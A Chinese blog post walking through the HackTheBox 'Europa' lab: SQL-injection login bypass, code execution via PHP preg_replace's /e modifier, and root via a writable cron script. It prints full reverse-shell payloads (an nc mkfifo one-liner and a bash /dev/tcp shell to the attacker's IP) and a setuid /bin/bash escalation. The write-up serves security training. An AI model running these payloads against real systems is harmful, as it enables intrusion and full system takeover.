HackTheBox-Machines--Europa

于 2024-05-17 15:05:18 发布
阅读量356 收藏 7
点赞数 3
分类专栏: 靶场集合 # HACK THE BOX 文章标签: Hack The Box SQL注入漏洞 preg_replace 计划任务提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/138959131
版权

文章目录

Europa 测试过程

0x01 信息收集

1.端口扫描

发现 ssh(22)、HTTP(80)、HTTPS(443) 端口
发现子域www.europacorp.htbadmin-portal.europacorp.htb

nmap -sC -sV 10.129.199.109

在这里插入图片描述

echo "10.129.199.109 www.europacorp.htb admin-portal.europacorp.htb" | sudo tee -a /etc/hosts

2.访问 80 443 端口,页面为Apache2 Ubuntu 默认页面

在这里插入图片描述

3.访问子域

  访问子域时发现,访问 https://admin-portal.europacorp.htb 跳转到 https://admin-portal.europacorp.htb/login.php页面

在这里插入图片描述

0x02 SQL注入漏洞

1.登录页面SQL注入测试

  1)' 字符测试,报错显示可能存在SQL注入漏洞,数据库为MySQL数据库,密码加密算法为MD5
在这里插入图片描述

  2)# 字符注释测试,在进行注释后,页面跳转到 https://admin-portal.europacorp.htb/dashboard.php

在这里插入图片描述

  3)刷新页面,绕过登录认证
在这里插入图片描述

2.Tools功能下OpenVPN配置生成器利用

  输入 1.1.1.1 作为 IP,该虚拟配置文本,每次显示"ip_address"时,IP都为 1.1.1.1。
在这里插入图片描述

"openvpn": {
"vtun0": {
"local-address": {
"10.10.10.1": "''"
},
"local-port": "1337",
"mode": "site-to-site",
"openvpn-option": [
"--comp-lzo",
"--float",
"--ping 10",
"--ping-restart 20",
"--ping-timer-rem",
"--persist-tun",
"--persist-key",
"--user nobody",
"--group nogroup"
],
"remote-address": "1.1.1.1",
"remote-port": "1337",
"shared-secret-key-file": "/config/auth/secret"
},
"protocols": {
"static": {
"interface-route": {
"1.1.1.1/24": {
"next-hop-interface": {
"vtun0": "''"
}
}
}
}
}
}

  查看生成配置的请求文件,需要三个参数,pattern、ipaddress和text。

  pattern参数分析: pattern参数的值为:%2Fip_address%2F,解码为/ip_address/,在php中,与preg_replace() 执​​行正则表达式搜索相似。

在这里插入图片描述

3.preg_replace() 分析

  preg_replace() 函数是 PHP 中的一个正则表达式替换函数,可以实现对字符串中符合正则表达式匹配的内容进行替换。其用法如下:

preg_replace($pattern, $replacement, $subject, $limit = -1, &$count = null)

其中:

  • $pattern:正则表达式模式;
  • $replacement:替换的内容,可以是一个字符串,也可以是一个数组;
  • $subject:要进行替换的字符串;
  • $limit:可选参数,表示最大替换次数,默认为 -1,表示不限制;
  • $count:可选参数,是一个变量,用来存放替换的次数。

  在preg_replace() 中,用带 e 修饰符的代码替换某些字符串,生成一个正则表达式,传递PHP 代码来执行,如下所示:

?replace=/you/i&with=you
输出为you
?replace=/you/e&with=phpinfo();
输出为phpinfo页面

4.preg_replace() e修饰符代码执行漏洞利用

pattern=%2Fx%2Fe&ipaddress=system("id")%3b&text=x

在这里插入图片描述

5.获取shell

在这里插入图片描述

pattern=%2Fx%2Fe&ipaddress=system("rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.25+4444+>/tmp/f")%3b&text=x

在这里插入图片描述

0x03权限提升

1. 将shell升级为PTY

使用python -c 'import pty;pty.spawn("bash")' 升级为PTY shell 无效;
使用python3 -c 'import pty;pty.spawn("bash")' 升级为PTY shell 成功。

在这里插入图片描述

在这里插入图片描述

计划任务提权

1.检查服务器 /var/www 文件

在这里插入图片描述

2.检查/cronjobs 目录

在这里插入图片描述

  cronjobs 目录下有一个root权限的可执行文件 clearlogs,clearlogs​ 文件显示​ /var/www/cmd/logcleared.sh​ 是以 root 权限执行的。

cat /var/www/cmd/logcleared.sh

  查看logcleared.sh,但是显示没有该文件
在这里插入图片描述

ls -al /var/www/cmd

  查看/var/www/cmd目录权限,发现用户www-data 有权将任何文件写入 /var/www/cmd 下

在这里插入图片描述

3.创建 logcleared.sh 文件提升权限

  /var/www/cmd 目录具有 root 权限,所以可以通过在目录下写入 /bin/bash 获取 root权限

echo 'chmod u+s /bin/bash' > logcleared.sh
chmod 777 logcleared.sh

在这里插入图片描述

  间隔一分钟后执行 /bin/bash -p ,获取到root权限

在这里插入图片描述

echo '/bin/bash -c "bash -i >& /dev/tcp/10.10.14.25/4444 0>&1"' > logcleared.sh

在这里插入图片描述

李沉肩
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Android系统之路(初识MTK) ------ make update-api长按Power键添加Reboot项/内置默认Ringtone/SMS/Notification/Alarm删除系统铃声
Engineer-Jsp的专栏
01-25 5222
Android系统之路(初识MTK) ------ make update-api长按Power键添加Reboot项/内置默认Ringtone/SMS/Notification/Alarm删除系统铃声
Europa-Explorer
04-29
欧罗巴探索者 这是Gatlin Andrews,Ryan Russell和Alex Rash创建的“太空探索者”的一个版本。
eclipse-java-europa-winter-win32
07-01
专属jdk1.5的eclipse开发版本,找了好久这个,共享给需要的小伙伴们
前端项目-europa.zip
09-02
前端项目-europa,Library for converting HTML into valid Markdown
No.106-HackTheBox-Linux-Europa-Walkthrough渗透学习
qq_34801745的博客
05-20 340
** HackTheBox-Linux-Europa-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/27 靶机难度:中级(4.5/10) 靶机发布日期:2017年10月5日 靶机描述: Europa can present a bit of a challenge, or can be quite easy, depending on if you know what to look for. While it doe
hackthebox - Europa (考点:dns信息搜集 & SQL注入 & php代码审计漏洞 preg_replace() & cronjob提权)
冬萍子癸水
05-28 244
1 扫描 22想到有可能ssh登录 80 http 和443https 都是进网页搜集信息 底下还提示了新的dns domainadmin-portal.europacorp.htb,加到本机kali的/etc/hosts里 10.10.10.22 admin-portal.europacorp.htb C:\root> nmap -A 10.10.10.22 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-28 03:38 EDT Nmap
WRF-Chem笔记——相关数据下载网址链接
砍柴姑娘Jourosy的博客
12-30 4384
好久又没写博客,太懒了。想想还是应该多写,先搬运点以前的存货。 跑模式的朋友们都知道我们需要各种各样的数据,包括排放数据、初始场边界场数据等等。今天这里先介绍一些常用数据下载地址。 1. 排放数据: 人为排放:包括EDGAR全球排放,亚洲地区MIX排放清单,还有中国地区最常用的MEIC排放清单。 EDGAR: EDGAR 分部门数据: http://edgar.jrc.ec.europa.eu/overview.php?v=432_AP EDGAR_HTAP: 此链接为EDGAR_HTAP 201.
data.table Way - Learning Note Part 2
岁月催猪老
09-25 1640
We resume the learning note.
iPhone 将被迫换成 USB-C 接口?苹果,你可怎么办啊......
热门推荐
m0_50065287的博客
09-26 1万+
提问:你家抽屉里有多少根充电线? 手机、平板电脑、蓝牙耳机、便携式音箱…想必一般每个设备都会配备一条充电线吧,而许多情况下接口不同又无法随意舍弃,只能贡献出一个抽屉,将所有的线全部塞进去,要用某一根时再一根根抽出来找。 最后线是找到了,人也是真的累了,并忍不住抱怨一句:“要是这些设备的充电接口都一样,只用一根充电线就好了!” 诶,你还别说,这愿望可能真的要实现了:本周四,欧盟委员会正式提出一项新议案,计划使 USB-C(即 USB Type-C)成为所有智能手机、平板电脑、相机、耳机、便携式扬声器和手持视频
europa-component-library:ECL-Europa组件库
05-12
ECL v2-Europa组件库 欧罗巴组件库(ECL)是适用于所有欧盟委员会网站(位于ec.europa.eu域下)的组件库。 该库包含可用于构建网站的所有可用组件。 该库的所有者是由DGs COMM,DIGIT和DTT领导的跨欧盟委员会的...
europa-validator
03-07
europa-validator
使用 docker-compose 部署 Euraka
张云飞Vir的专栏
05-22 321
0. 背景 我 docker-compose 将我 SrpingBoot 微服务部署在 docker 容器中,在部署 Euraka 时 总是失败,无法连接到 Euraka服务器,经过各种寻找终于解决,记录成本文。 1. 问题描述 将要连接的 Euraka 客户机在连接 Euraka 时提示“连接拒绝”,或者“无法找到服务“ 2. 解决 确保以下几处配置: 1) eureka 工程的 applic...
ESP8266-物联网开发基础
qq_46940519的博客
04-07 5896
ESP8266-物联网开发基础 安装 ESP8266-NodeMCU开发板驱动 NodeMCU开发板不是即插即用的设备,因此我们需要安装驱动才能使用。 安装 ESP8266-NodeMCU开发板驱动前,请先确保您的电脑已连接互联网。另外,请将NodeMCU开发板和USB数据线准备好以备安装使用。 准备安装驱动程序 百度网盘链接: https://pan.baidu.com/s/1lSzNy4BJGVh_elL1ahK9nA 提取码:rbb3 驱动安装完毕后将ESP8266-NodeMCU开发
ESP8266-Uart
qq_32619765的博客
08-21 862
ESP8266 -12F 的串口硬件分布 ESP8266 有两个UART。 默认官方UART0有TX、RX作为 系统的打印信息输出接口 和 数据收发口, UART1只有TX,作为 打印信息输出接口(调试用)。 修改设置,将UART0做为单片机的通信口,uart1未调试信息的打印口。 1.make menuconfig 进行设置。 取消默认串口输出波特率115200,也可以对uart0进行端口映射。 uart0 实现单片机通信 uart1 GPIO2 打印调试信息 ...
rockyou.txt
06-06
rockyou
ASP+ACCESS网上人才信息管理系统(源代码+论文)【ASP】.zip
06-06
ASP+ACCESS网上人才信息管理系统(源代码+论文)【ASP】
河北金融学院经济大数据课设2024年 软科学校爬虫课设
06-06
河北金融学院经济大数据课设2024年 软科学校爬虫课设
widgetsnbextension-4.0.0b0-py3-none-any.whl
最新发布
06-06
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
wrf-chem笔记——相关数据下载网址链接
06-28
### 回答1: wrf-chem数据下载的相关网址链接: 1. NCEP/NCAR Reanalysis I: ftp://ftp.cdc.noaa.gov/Datasets/ncep.reanalysis.dailyavgs/surface/ 2. Chemical Transport Model (CTM) data from the GEOS-Chem group: https://acmg.seas.harvard.edu/geos/ 3. Emissions data from the Emissions Database for Global Atmospheric Research (EDGAR): https://edgar.jrc.ec.europa.eu/ 4. The Community Multi-scale Air Quality (CMAQ) modeling system data: https://www.epa.gov/air-research/community-multiscale-air-quality-cmaq-modeling-system 请注意,不同的数据来源可能需要不同的许可证才能访问,请确保您具有访问所需数据的合法资格。 ### 回答2: WRF-Chem是一种大气化学模型,它用于模拟大气中化学物种的输运和转化过程。在建立WRF-Chem模型之前,我们需要收集和处理一些数据,以确保模型的准确性和可靠性。这些数据包括地理信息、排放数据、气象数据和化学初始和边界条件等。 首先,地理信息数据是建立WRF-Chem模型的基础。这些数据包括经纬度、高程和土地覆盖类型等信息,可以用于生成地形和表面辐射强度图。我们可以在https://www.ngdc.noaa.gov/上下载世界各地的地理数据。 其次,排放数据是描述大气中污染物来源和排放速率的关键数据。这些数据包括人工排放和自然排放两种来源。人工排放包括工业、交通和农业等活动产生的污染物,自然排放包括植被的插值和火山喷发等自然事件。各个国家和地区的排放数据可在Emission Database for Global Atmospheric Research (EDGAR) (https://www.sciencedirect.com/science/article/pii/S1352231009003904 )上下载。 第三,气象数据是WRF-Chem模型的必需数据。气象数据包括气温、风速、风向和湿度等逐小时或逐分钟的数据。我们可以在National Centers for Environmental Prediction (NCEP) (https://www.ncdc.noaa.gov/data-access/model-data/model-datasets)或European Center for Medium-Range Weather Forecasts (ECMWF) (https://www.ecmwf.int/en/forecasts/datasets)上下载气象数据。 最后,化学初始和边界条件数据是指大气中化学物种的浓度和化学反应速率等信息。这些数据通常由现场观测或其他化学模型得出,可以在全球化学输送模型 (GEOS-Chem) (http://acmg.seas.harvard.edu/geos/)上获取。 总之,WRF-Chem模型的建立需要以上四个基本数据。这些数据可以在相关数据下载网址上获取。但是,这些数据的质量和格式都需要我们认真审查和处理,以确保WRF-Chem模型的准确性和可靠性。 ### 回答3: wrf-chem是一种用于模拟大气物质输运和化学反应的数值模型。在进行wrf-chem模拟时,需要使用许多与气体和颗粒物浓度、化学反应等相关的数据。这些数据可以通过官方网站和其他一些数据平台进行下载。 其中,官方网站是wrf-chem模型最全面的数据源,开发者提供了许多与模型运行相关的数据和工具。这些数据包括了不同时间尺度上的气象模型、气体和颗粒物浓度模型、化学反应模型、辐射强度模型等。此外,网站中还提供了许多工具,例如反求模块、统计模块等,可以用于模型调试和后处理。下载方式为直接点击网站上的下载链接,选择相应的数据和工具即可。 另外,还有一些数据平台也可以提供相关数据的下载,例如NCAR Data Portal、Earth System Grid、国家气象信息中心等。这些平台通常提供了一些免费的数据下载服务,但需要用户进行注册和认证。同时,有些数据需要进行特定的格式转换,才能够被wrf-chem模型所使用。 总体来说,wrf-chem模型所需的数据比较丰富,但是通过官方网站和其他数据平台的配合,用户可以方便地获取这些数据,并进行相应的分析和后处理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值